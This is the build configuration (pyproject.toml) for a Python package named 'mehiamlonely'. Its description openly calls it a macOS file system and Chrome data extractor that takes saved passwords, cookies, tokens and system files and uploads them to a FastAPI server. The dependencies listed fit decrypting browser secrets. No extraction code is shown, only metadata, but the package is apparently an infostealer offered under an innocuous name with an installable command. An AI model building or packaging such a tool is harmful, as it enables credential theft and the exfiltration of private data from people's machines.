[build-system]
requires = ["hatchling"]
build-backend = "hatchling.build"

[project]
name = "mehiamlonely"
version = "0.1.0"
description = "macOS File System and Chrome Data Extractor - Extracts Chrome passwords, cookies, tokens, and system files, uploads to FastAPI server"
authors = [{name = "Your Name", email = "your.email@example.com"}]
dependencies = [
    "httpx",
    "cryptography",
    "keyring",
    "pycryptodome",
    "aiofiles",
    "psutil",
]
[project.scripts]
mehiamlonely = "mehiamlonely.cli:cli_main"